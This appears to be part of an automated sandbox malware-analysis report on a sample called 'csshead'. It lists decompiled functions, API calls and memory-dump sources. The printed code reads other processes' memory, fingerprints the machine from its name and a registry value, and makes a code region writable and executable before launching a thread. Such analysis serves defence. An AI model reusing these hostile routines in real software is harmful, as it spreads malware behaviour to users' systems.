0x00406c55
0x00406c56
0x00406c57
0x00406c58
0x00406c59
0x00406c5a
0x00406c5b
0x00406c5c
0x00406c5d
0x00406c5e
0x00406c5f
0x00406c60
0x00406c61
0x00406c63
0x00406c69
0x00406c6a
0x00406c6d
0x00406ca7
0x00406cbc
0x00406cc6
0x00406ccf
0x00406cd1
0x00406cd2
0x00406cd7
0x00406ccf
0x00406cde
0x00406c6f
0x00406c6f
0x00406c72
0x00406c75
0x00406c7c
0x00000000
0x00406c7e
0x00406c8a
0x00406c94
0x00406c9c
0x00406ca4
0x00406ca4
0x00406c7c
0x00406c6d
0x00406c1c
0x00406bc9
0x00000000

APIs

Sleep.KERNELBASE ref: 00406B94
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00406BB8
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,00000000), ref: 00406BFE
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,?,?,?,00000000), ref: 00406C4F

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00404EF0, Relevance: 6.1, APIs: 4, Instructions: 112

C-Code - Quality: 83%

			E00404EF0(void* __eax, void* __eflags) {
				void* _v8;
				void _v12;
				void* _v16;
				void _v20;
				void _v24;
				void* _v28;
				void* _v32;
				long _v36;
				intOrPtr* _v40;
				void* _v52;
				void _v64;
				void* _t54;
				signed int _t63;
				signed int _t72;
				signed int _t88;
				signed int _t96;

				_v8 = __eax;
				_v24 = 0;
				_v12 = 0;
				_v28 = E004013DC(0x1000);
				_t54 = E00404E94(_v8); // executed
				_v32 = _t54;
				if(_v32 != 0) {
					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36); // executed
					asm("sbb eax, eax");
					if( ~( ~_t63) != 0) {
						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36); // executed
						asm("sbb eax, eax");
						if( ~( ~_t72) != 0) {
							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
							_v40 = _v28 + 0xc0;
							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
								asm("sbb eax, eax");
								if( ~( ~_t88) != 0) {
									_v16 = _v52;
									if(_v16 != 0) {
										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
										asm("sbb eax, eax");
										if( ~( ~_t96) != 0) {
											_v20 =  *_v28;
											if(_v20 != 0) {
												_v24 = _v20;
											}
										}
									}
								}
							}
						}
					}
				}
				E00401440(_v28);
				_v12 = _v24;
				return _v12;
			}

0x00404ef6
0x00404efb
0x00404f00
0x00404f0d
0x00404f13
0x00404f18
0x00404f1f
0x00404f3a
0x00404f42
0x00404f48
0x00404f69
0x00404f71
0x00404f77
0x00404f86
0x00404f91
0x00404f9a
0x00404fbc
0x00404fc4
0x00404fca
0x00404fcf
0x00404fd6
0x00404fed
0x00404ff5
0x00404ffb
0x00405002
0x00405009
0x0040500e
0x0040500e
0x00405009
0x00404ffb
0x00404fd6
0x00404fca
0x00404f9a
0x00404f77
0x00404f48
0x00405014
0x0040501c
0x00405025

APIs

Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2

Part of subcall function 00404E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
Part of subcall function 00404E94: ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD

ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406900, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
registry

C-Code - Quality: 92%

			E00406900(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v117;
				char _v153;
				char* _t30;
				intOrPtr _t35;

				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
				}
				_t30 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24); // executed
				_v12 = 4;
				_v20 = 0;
				_t35 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v24, _t35, 0, 0,  &_v20,  &_v12); // executed
				E00403890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E00401164(_v16, _v8);
			}

0x00406900
0x00406901
0x00406903
0x0040690d
0x00406912
0x00406915
0x0040692f
0x0040694c
0x0040694c
0x0040695a
0x00406965
0x0040696b
0x00406974
0x00406983
0x0040698d
0x00406998
0x004069a8
0x004069b9

APIs

GetComputerNameA.KERNEL32(?,?), ref: 00406927
RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965

Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D

Strings

t!@, xrefs: 0040695A

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406904, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
registry

C-Code - Quality: 100%

			E00406904(intOrPtr __eax) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				char* _t28;
				intOrPtr _t33;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
				}
				_t28 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24); // executed
				_v12 = 4;
				_v20 = 0;
				_t33 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v24, _t33, 0, 0,  &_v20,  &_v12); // executed
				E00403890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E00401164(_v16, _v8);
			}

0x0040690d
0x00406912
0x00406915
0x0040692f
0x0040694c
0x0040694c
0x0040695a
0x00406965
0x0040696b
0x00406974
0x00406983
0x0040698d
0x00406998
0x004069a8
0x004069b9

APIs

GetComputerNameA.KERNEL32(?,?), ref: 00406927
RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965

Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D

Strings

t!@, xrefs: 0040695A

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0042CDE6, Relevance: 4.6, APIs: 3, Instructions: 72

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70

Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00403D10, Relevance: 3.8, APIs: 3, Instructions: 38

C-Code - Quality: 100%

			E00403D10(CHAR* _a4, CHAR* _a8) {
				CHAR* _t4;
				CHAR* _t7;
				char _t8;
				CHAR* _t10;

				_t10 = _a4;
				if(_t10 == 0) {
					L8:
					return 0;
				} else {
					_t7 = _a8;
					while( *_t10 != 0) {
						_t4 = _t7;
						if(_t7 == 0) {
							L7:
							_t10 = CharNextA(_t10);
							if(_t10 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							while(1) {
								_t8 =  *_t4;
								if(_t8 == 0) {
									goto L7;
								}
								if( *_t10 == _t8) {
									return CharNextA(_t10);
								} else {
									_t4 = CharNextA(_t4); // executed
									if(_t4 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
								goto L10;
							}
							goto L7;
						}
						goto L10;
					}
					goto L8;
				}
				L10:
			}

0x00403d12
0x00403d19
0x00403d4c
0x00403d4f
0x00403d1b
0x00403d1b
0x00403d25
0x00403d2a
0x00403d2e
0x00403d41
0x00403d44
0x00403d48
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d30
0x00403d30
0x00403d30
0x00403d34
0x00000000
0x00000000
0x00403d38
0x00403d56
0x00403d3a
0x00403d3b
0x00403d3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d3f
0x00000000
0x00403d38
0x00000000
0x00403d30
0x00000000
0x00403d2e
0x00000000
0x00403d25
0x00000000

APIs

CharNextA.USER32(?), ref: 00403D3B
CharNextA.USER32(?), ref: 00403D42
CharNextA.USER32(?), ref: 00403D51

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00424443, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54

APIs

Part of subcall function 0042893E: RtlEncodePointer.NTDLL(5316C151), ref: 0042894A

__initterm_e.LIBCMT ref: 00424479

Part of subcall function 0042C3B0: __FindPESection.LIBCMT ref: 0042C40B

Strings

06C, xrefs: 00424495

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00424443, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54

C-Code - Quality: 23%

			E00424443(void* __edi, void* __esi, intOrPtr _a4) {
				void* _t3;
				intOrPtr* _t9;
				void* _t19;
				intOrPtr* _t20;
				void* _t22;

				_t22 = __esi;
				_t19 = __edi;
				_t25 =  *0x436b28;
				if( *0x436b28 != 0 && E0042C3B0(_t25, 0x436b28) != 0) {
					 *0x436b28(_a4);
				}
				E0042893E();
				_t3 = L0042441F(0x433634, 0x433650); // executed
				_t27 = _t3;
				if(_t3 == 0) {
					_push(_t22);
					_push(_t19);
					E004249B3(_t27, 0x42c2f8); // executed
					_t20 = 0x433618;
					if(0x433618 >= 0x433630) {
						L8:
						_t31 =  *0x444aa8;
						if( *0x444aa8 != 0 && E0042C3B0(_t31, 0x444aa8) != 0) {
							 *0x444aa8(0, 2, 0);
						}
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						_t9 =  *_t20;
						if(_t9 != 0) {
							 *_t9();
						}
						_t20 = _t20 + 4;
					} while (_t20 < 0x433630);
					goto L8;
				}
				return _t3;
			}

0x00424443
0x00424443
0x00424448
0x0042444f
0x00424463
0x00424469
0x0042446a
0x00424479
0x00424480
0x00424482
0x00424484
0x00424485
0x0042448b
0x0042449b
0x0042449f
0x004244b0
0x004244b0
0x004244b9
0x004244d0
0x004244d0
0x00000000
0x00000000
0x00000000
0x00000000
0x004244a1
0x004244a1
0x004244a1
0x004244a5
0x004244a7
0x004244a7
0x004244a9
0x004244ac
0x00000000
0x004244a1
0x004244d9

APIs

Part of subcall function 0042893E: RtlEncodePointer.NTDLL(0042F6FF,?,?,0042446F), ref: 0042894A

__initterm_e.LIBCMT ref: 00424479

Part of subcall function 0042C3B0: __FindPESection.LIBCMT ref: 0042C40B

Strings

06C, xrefs: 00424495

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00423911, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41

APIs

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0

std::exception::exception.LIBCMT ref: 00423960

Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3

Strings

@G@, xrefs: 00423943

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00423911, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41

C-Code - Quality: 66%

			E00423911(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char* _v8;
				signed int _v20;
				intOrPtr _v24;
				signed int _v36;
				void* _v40;
				void _v64;
				void* _t23;
				signed int _t24;
				signed int _t29;
				signed int _t38;
				void* _t42;
				void* _t43;
				void* _t49;

				_t49 = __esi;
				_t43 = __edi;
				_t42 = __edx;
				while(1) {
					_t23 = E00422A18(_t42, _t43, _t49, _a4); // executed
					if(_t23 != 0) {
						break;
					}
					_t24 = L00427A95(_a4);
					__eflags = _t24;
					if(_t24 == 0) {
						__eflags =  *0x442bfc & 0x00000001;
						if(( *0x442bfc & 0x00000001) == 0) {
							 *0x442bfc =  *0x442bfc | 0x00000001;
							__eflags =  *0x442bfc;
							_push(1);
							_v8 = "bad allocation";
							L00423101(0x442bf0,  &_v8);
							 *0x442bf0 = 0x435828;
							E004249B3( *0x442bfc, 0x432eb5);
						}
						L00423217( &_v20, 0x442bf0);
						_push(0x43c9f8);
						_push( &_v20);
						_v20 = 0x435828;
						L7();
						asm("int3");
						_push(0x435828);
						_push(0x442bf0);
						_t38 = 8;
						_v40 = memcpy( &_v64, 0x436bb0, _t38 << 2);
						_t29 = _v20;
						_v36 = _t29;
						__eflags = _t29;
						if(_t29 != 0) {
							__eflags =  *_t29 & 0x00000008;
							if(( *_t29 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						return  *0x4332c8(_v40, _v36, _v24,  &_v20);
					} else {
						continue;
					}
					L11:
				}
				return _t23;
				goto L11;
			}

0x00423911
0x00423911
0x00423911
0x00423928
0x0042392b
0x00423933
0x00000000
0x00000000
0x0042391e
0x00423924
0x00423926
0x00423937
0x00423948
0x0042394a
0x0042394a
0x00423951
0x00423959
0x00423960
0x0042396a
0x00423970
0x00423975
0x0042397a
0x0042397f
0x00423987
0x00423988
0x0042398b
0x00423990
0x0042399c
0x0042399d
0x004239a0
0x004239ab
0x004239ae
0x004239b2
0x004239b6
0x004239b8
0x004239ba
0x004239bd
0x004239bf
0x004239bf
0x004239bd
0x004239da
0x00000000
0x00000000
0x00000000
0x00000000
0x00423926
0x00423936
0x00000000

APIs

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D

Part of subcall function 00427A95: DecodePointer.KERNEL32(?,0042B008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 00427AA0

std::exception::exception.LIBCMT ref: 00423960

Part of subcall function 00423991: RaiseException.KERNEL32(?,?,?,?), ref: 004239D3

Strings

@G@, xrefs: 00423943

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004090B8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

C-Code - Quality: 100%

			E004090B8(void* __edx) {
				long _v8;
				intOrPtr _t4;
				void* _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t15;
				intOrPtr _t17;
				intOrPtr _t20;

				E0040252C();
				_t4 =  *0x40a274; // 0x4021ec
				_t6 =  *0x40a078; // 0x401bd8
				VirtualProtect(_t6, _t4 -  *0x40a078, 0x40,  &_v8);
				_t17 =  *0x40a164; // 0x401de4
				_t8 =  *0x40a078; // 0x401bd8
				E00407C08(_t8 + 5, _t17 -  *0x40a078 - 5);
				_t20 =  *0x40a274; // 0x4021ec
				_t11 =  *0x40a164; // 0x401de4
				E0040898C(_t11 + 5, _t20 -  *0x40a164 - 5);
				_t15 = E00402574(0); // executed
				return _t15;
			}

0x004090bc
0x004090c7
0x004090d3
0x004090d9
0x004090df
0x004090ee
0x004090f6
0x004090fb
0x0040910a
0x00409112
0x00409119
0x00409120

APIs

VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9

Strings

!@, xrefs: 004090C7, 004090FB

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406DB0, Relevance: 3.0, APIs: 2, Instructions: 33sleep

APIs

GetTickCount.KERNEL32 ref: 00406DCE
Sleep.KERNELBASE(000001F4), ref: 00406DDC

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00422804, Relevance: 3.0, APIs: 2, Instructions: 22LIBRARYCODE

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00422804, Relevance: 3.0, APIs: 2, Instructions: 22

C-Code - Quality: 100%

			E00422804(void* _a4) {
				char _t3;
				intOrPtr* _t4;
				intOrPtr _t6;

				if(_a4 != 0) {
					_t3 = RtlFreeHeap( *0x4432a4, 0, _a4); // executed
					_t12 = _t3;
					if(_t3 == 0) {
						_t4 = L004251B8(_t12);
						_t6 = E00425176(GetLastError());
						 *_t4 = _t6;
						return _t6;
					}
				}
				return _t3;
			}

0x0042280d
0x0042281a
0x00422820
0x00422822
0x00422825
0x00422833
0x00422839
0x00000000
0x0042283b
0x00422822
0x0042283d

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00406DC8, Relevance: 3.0, APIs: 2, Instructions: 20sleep

APIs

GetTickCount.KERNEL32 ref: 00406DCE
Sleep.KERNELBASE(000001F4), ref: 00406DDC

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00409468, Relevance: 3.0, APIs: 2, Instructions: 19
thread

C-Code - Quality: 82%

			E00409468(signed int __eax, void* __edx) {
				long _v8;
				intOrPtr _v117;
				long _t9;

				 *(__eax & 0x5c000075) =  *(__eax & 0x5c000075) + (__eax & 0x5c000075);
				_v117 = _v117 + __edx;
				E004090B8(__edx); // executed
				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
				_push(0); // executed
				_t9 = RtlExitUserThread(); // executed
				return _t9;
			}

0x0040946d
0x0040946f
0x00409474
0x0040948a
0x00409490
0x00409492
0x0040949a

APIs

Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9

CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00409470, Relevance: 3.0, APIs: 2, Instructions: 17
thread

C-Code - Quality: 75%

			E00409470() {
				long _v8;
				long _t5;
				void* _t6;

				E004090B8(_t6); // executed
				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
				_push(0); // executed
				_t5 = RtlExitUserThread(); // executed
				return _t5;
			}

0x00409474
0x0040948a
0x00409490
0x00409492
0x0040949a

APIs

Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9

CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004070E5, Relevance: 1.6, APIs: 1, Instructions: 75
registry

C-Code - Quality: 81%

			E004070E5(void* __ecx) {
				signed char _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* _v24;
				void* _v28;
				char _v285;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t44;
				intOrPtr _t50;
				signed int _t53;

				 *0x237c1fdf = 0xeb;
				asm("das");
				 *(__ecx - 0x24) =  *(__ecx - 0x24) >> 0x41;
				 *0x000000EB =  *((intOrPtr*)(0xeb)) + 0xeb;
				 *((intOrPtr*)(0xeb)) =  *((intOrPtr*)(0xeb)) + 0xeb;
				asm("scasd");
				asm("adc eax, 0xdf023c78");
				 *0x4e =  *0x4e + 0x4e;
				_v8 = 0;
				_t31 =  *0x40a564; // 0x4070d0
				_v20 = E00403F38(_t31);
				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
				E00401440(_v20);
				_v16 = 0x101;
				_t38 =  *0x40a568; // 0x4070f0
				_v24 = E00403F38(_t38);
				_t44 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
				if(_t44 == 0) {
					_t50 =  *0x40a56c; // 0x407108
					_v28 = E00403F38(_t50);
					_t53 = E00401110( &_v285, _v28);
					asm("sbb eax, eax");
					_v8 =  ~(_t53 & 0xffffff00 | _t53 != 0x00000000);
					E00401440(_v28);
				}
				E00401440(_v24);
				E00403890(_v12);
				return _v8;
			}

0x004070f2
0x004070f7
0x00407100
0x00407104
0x00407106
0x0040710f
0x00407110
0x00407116
0x00407123
0x00407126
0x00407130
0x00407147
0x00407150
0x00407155
0x0040715c
0x00407166
0x00407180
0x0040718a
0x0040718c
0x00407196
0x004071a2
0x004071ae
0x004071b0
0x004071b6
0x004071b6
0x004071be
0x004071c6
0x004071d1

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00422A18, Relevance: 1.6, APIs: 1, Instructions: 58LIBRARYCODE

APIs

Part of subcall function 00426368: GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404
Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426433
Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426440
Part of subcall function 00426368: GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
Part of subcall function 00426368: _strlen.LIBCMT ref: 004264F3
Part of subcall function 00426368: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502

Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3

